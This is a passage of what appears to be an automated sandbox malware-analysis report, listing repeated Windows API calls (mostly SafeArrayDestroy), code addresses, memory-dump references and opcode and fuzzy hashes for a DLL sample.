                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 189561132-0
                                                                                          • Opcode ID: 4bac63560436791c79a780c8b5e9acfd269aded0679b8e55b010d550d98d2ace
                                                                                          • Instruction ID: b0c41b0b0f634ae2be9877483412308809388825198e4053a3b2743b3ed7aefe
                                                                                          • Opcode Fuzzy Hash: 4bac63560436791c79a780c8b5e9acfd269aded0679b8e55b010d550d98d2ace
                                                                                          • Instruction Fuzzy Hash: B3316AB29046449FDB10CF99D880A9AFBF4FF58310B45855EE95AD7B41E730E504CFA1
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: e008c0142c0749583fcda3152edbf45bbfa93f44252878fbdecb638b8494725d
                                                                                          • Instruction ID: b793d4d8616da72c19f9feee69b2ee5cbcdb6620bc4276c8d8bd51057014ddde
                                                                                          • Opcode Fuzzy Hash: e008c0142c0749583fcda3152edbf45bbfa93f44252878fbdecb638b8494725d
                                                                                          • Instruction Fuzzy Hash: 76312B70E016189FDB10CB68CC80FAEB7F9AF89210F60868AE519E7255DB75E9418F50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: bfb2e4d0ef1a20a5cb77fde5e692ffefe4f074a44e651d4a3ec70972d1123772
                                                                                          • Instruction ID: 6c3f13ae552290e03c75501d500b1a0485c16d8a630b6eda17b333628f1e6ef2
                                                                                          • Opcode Fuzzy Hash: bfb2e4d0ef1a20a5cb77fde5e692ffefe4f074a44e651d4a3ec70972d1123772
                                                                                          • Instruction Fuzzy Hash: 41314970E016189FEB10DB68CC80F6EB7FAAF89210F24859AE419E7241CB71E9418F50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 734beccb21f6766787dc7cae065449a62f4d4faac041286b03942d688f7b655a
                                                                                          • Instruction ID: 2fde36ab5ab06b65cbe2aa238e9e261c250ea5d949ed267dfe14e1451a7dcbc6
                                                                                          • Opcode Fuzzy Hash: 734beccb21f6766787dc7cae065449a62f4d4faac041286b03942d688f7b655a
                                                                                          • Instruction Fuzzy Hash: 1E313870E016189FEB10CBA8CC80FAEB7FAAF89210F20858AE519E7241CB71DD418F50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: e008c0142c0749583fcda3152edbf45bbfa93f44252878fbdecb638b8494725d
                                                                                          • Instruction ID: c7bbc1487c6f4c04e48125abec48f9acb959925614e23a9c008d77031a92c306
                                                                                          • Opcode Fuzzy Hash: e008c0142c0749583fcda3152edbf45bbfa93f44252878fbdecb638b8494725d
                                                                                          • Instruction Fuzzy Hash: 5B314B70E116189FDB10CFA9CC80BADB7F9AF89200F60868AE559EB241C771DA818F50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c434d91f3d4e7840c933eb38969606d7cc0d3969ffc3930d269bd607cd8a6c6c
                                                                                          • Instruction ID: b16de8c5dc53415030016efd100fbb2749cdd5ea94c7d32f886242fae23b5c49
                                                                                          • Opcode Fuzzy Hash: c434d91f3d4e7840c933eb38969606d7cc0d3969ffc3930d269bd607cd8a6c6c
                                                                                          • Instruction Fuzzy Hash: 47313E70E156189FDB10CFA9CD80BADB7FAAF89200F60858AE559EB241C771E9418F50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c872b739c7545842e3ba02720de5cc711a6f4034af29720dbd2e0d314ec4bd8c
                                                                                          • Instruction ID: 676e3fd40f709e5a227d2aebe6314c64389783aa7ab504f196f033fe6c91c7de
                                                                                          • Opcode Fuzzy Hash: c872b739c7545842e3ba02720de5cc711a6f4034af29720dbd2e0d314ec4bd8c
                                                                                          • Instruction Fuzzy Hash: FA312B70E016189FDB10DBA8CC80F6EB7F9AF89210F60858AE519E7245CB75D941CF50
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6D0725B1,?,00000000,?), ref: 6D0724E6
                                                                                          • _malloc.LIBCMT ref: 6D07251B
                                                                                          • _memset.LIBCMT ref: 6D07253B
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6D072550
                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D07255E
                                                                                          • __freea.LIBCMT ref: 6D072568
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                                                                          • String ID:
                                                                                          • API String ID: 525495869-0
                                                                                          • Opcode ID: b1390a93754809e1f4f5f20129681e67ceeb9eee405742692837bca1676282d8
                                                                                          • Instruction ID: f1c9e9fdd114b2b72a0f6113c51155ddaa7c2edfe0b7ac2ee486b955a57421c3
                                                                                          • Opcode Fuzzy Hash: b1390a93754809e1f4f5f20129681e67ceeb9eee405742692837bca1676282d8
                                                                                          • Instruction Fuzzy Hash: 3A3159B160024AAFFF21DF68DC90EAF7BE9EB09358F114425FA159B250E730D9608B64
                                                                                          APIs
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                          • String ID:
                                                                                          • API String ID: 757764206-0
                                                                                          • Opcode ID: 1e6f7b7dce5f7784475edf30d577815a120db3ad4df287efa4e6ff796eb938dd
                                                                                          • Instruction ID: 1916a1cdc9561ae0e781cd3ff48d11f9185756488d9243e86b5bba5fe1b860ef
                                                                                          • Opcode Fuzzy Hash: 1e6f7b7dce5f7784475edf30d577815a120db3ad4df287efa4e6ff796eb938dd
                                                                                          • Instruction Fuzzy Hash: EA312C70E016189FDF10DB68CC80FAEB7FAAF89210F60468AE519E7241CB75D9818F50
                                                                                          APIs
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                          • String ID:
                                                                                          • API String ID: 757764206-0
                                                                                          • Opcode ID: 1c2e2aeb9485c5ef97734c8f92b903dfe03b6da26fbf8476bfd936cbe4f52b12
                                                                                          • Instruction ID: 7a7af87eea557cbd9e3bb318d672390ce1f9e9d9d8fef4dd524434f54467e09b
                                                                                          • Opcode Fuzzy Hash: 1c2e2aeb9485c5ef97734c8f92b903dfe03b6da26fbf8476bfd936cbe4f52b12
                                                                                          • Instruction Fuzzy Hash: 90312A70E016189FEF10DB68CC80FAEB7FAAF95610F60458AE519E7241CB75D9818F50
                                                                                          APIs
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                          • String ID:
                                                                                          • API String ID: 757764206-0
                                                                                          • Opcode ID: 1c2e2aeb9485c5ef97734c8f92b903dfe03b6da26fbf8476bfd936cbe4f52b12
                                                                                          • Instruction ID: 82042e11f4e339c90aeae474fe1da60ce2c73d96afc5258ea10fca6f5d67bea5
                                                                                          • Opcode Fuzzy Hash: 1c2e2aeb9485c5ef97734c8f92b903dfe03b6da26fbf8476bfd936cbe4f52b12
                                                                                          • Instruction Fuzzy Hash: 0B314F70E156189FDB10DFA9CD80BADB7FAAF85300F60458AE559EB241C775DE808F50
                                                                                          APIs
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                          • String ID:
                                                                                          • API String ID: 757764206-0
                                                                                          • Opcode ID: 1e6f7b7dce5f7784475edf30d577815a120db3ad4df287efa4e6ff796eb938dd
                                                                                          • Instruction ID: 8496f6c7498fd99c2f4716da319b2bcae23f6e1d7cced58a47237b93a9d336fb
                                                                                          • Opcode Fuzzy Hash: 1e6f7b7dce5f7784475edf30d577815a120db3ad4df287efa4e6ff796eb938dd
                                                                                          • Instruction Fuzzy Hash: 47313E70E156189FDB10CFA9CC80BADB7FAAF89300F60468AE559EB241C775DE808F50
                                                                                          APIs
                                                                                            • Part of subcall function 6D004760: __CxxThrowException@8.LIBCMT ref: 6D0047F9
                                                                                          • _memmove.LIBCMT ref: 6D060907
                                                                                          • _memmove.LIBCMT ref: 6D060936
                                                                                          • _memmove.LIBCMT ref: 6D060959
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D060A25
                                                                                          Strings
                                                                                          • PSSR_MEM: message recovery disabled, xrefs: 6D0609E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: _memmove$Exception@8Throw
                                                                                          • String ID: PSSR_MEM: message recovery disabled
                                                                                          • API String ID: 2655171816-3051149714
                                                                                          • Opcode ID: c2764a0da58f37d78243811c354ab6b28ac9f4e0f9750989aac4b1c75a6f24e7
                                                                                          • Instruction ID: b40c5409e8f6b9ef7d40058dc44c1b811e8ef740856b6fcef53b625b3e39c3a3
                                                                                          • Opcode Fuzzy Hash: c2764a0da58f37d78243811c354ab6b28ac9f4e0f9750989aac4b1c75a6f24e7
                                                                                          • Instruction Fuzzy Hash: 86C149756083819FE715CF29C880B6ABBE6BFC9304F148A5CE589C7385D774E905CBA2
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D0680EA
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: Max$Min$RandomNumberType$invalid bit length
                                                                                          • API String ID: 3718517217-2498579642
                                                                                          • Opcode ID: 5b72ec63c837a0ca985210dc5a4054f92dcc58bbf0821b618e054021e312f500
                                                                                          • Instruction ID: 5c7975b108640208b23bd9601a84bf3b82eed18ee3b8ece20f00859ba0639a15
                                                                                          • Opcode Fuzzy Hash: 5b72ec63c837a0ca985210dc5a4054f92dcc58bbf0821b618e054021e312f500
                                                                                          • Instruction Fuzzy Hash: 04C18D7150C7809AF324CB28D850B9FB7E5BFDA304F464A6CE68983391EB749904C7A3
                                                                                          APIs
                                                                                          • __CreateFrameInfo.LIBCMT ref: 6D06BEB6
                                                                                            • Part of subcall function 6D06AB70: __getptd.LIBCMT ref: 6D06AB7E
